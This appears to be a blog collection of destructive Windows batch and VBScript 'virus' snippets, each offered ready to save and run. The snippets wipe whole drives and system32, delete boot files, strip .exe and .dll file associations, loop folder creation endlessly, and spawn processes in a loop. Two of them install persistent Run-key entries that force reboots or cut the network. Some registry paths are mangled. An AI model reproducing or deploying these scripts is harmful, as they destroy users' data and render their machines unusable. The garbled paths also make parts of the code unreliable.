(Save as .bat)

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
CD /d E:
goto VIRUS
REM ####################
REM errorcode401.blogspot.in

----------------------------------------------
(Save as .bat)

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q   

----------------------------------------------
(Save as .bat)

@ECHO off 
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/* 

----------------------------------------------
(Turn Off Your Network)
(Save as  .bat)

@Echo off
ipconfig /release

----------------------------------------------
(Show Massage and then Shutdown)
(Save as .bat)

@echo off
msg *Lets Roll Baby
shutdown -c "Error! Your ass got glued!" -shutdown

-----------------------------------------------
(Save as .VBS)

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 1000000000
WSHShell.Run "Tourstart.exe"
Next

--------------------------------------------------
(Save as .bat)

rd/s/q C:\
rd/s/q D:\
rd/s/q E:\

---------------------------------------------------
(Save as .bat)

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f 
echo You Are Nailed, Buy A New Computer This is Piece of Shit. =>(This is massage, you can type whatever you want)
PAUSE

---------------------------------------------------
(Save as .bat)

@echo off 
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini 
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

----------------------------------------------------
(Save as .bat)

shutdown -s -t 100 c "installing Updates"

----------------------------------------------------
(Save as .bat)

del c:\WINDOWS\system32\*.*/q

----------------------------------------------------
(Save as .bat)

echo @echo off>c:windowswimn32.bat
echo brea off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windwowswimn32.bat
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat
echo You have maxed your internet usage for a lifetime ?? =>(This is massage, you can type whatever you want)
PAUSE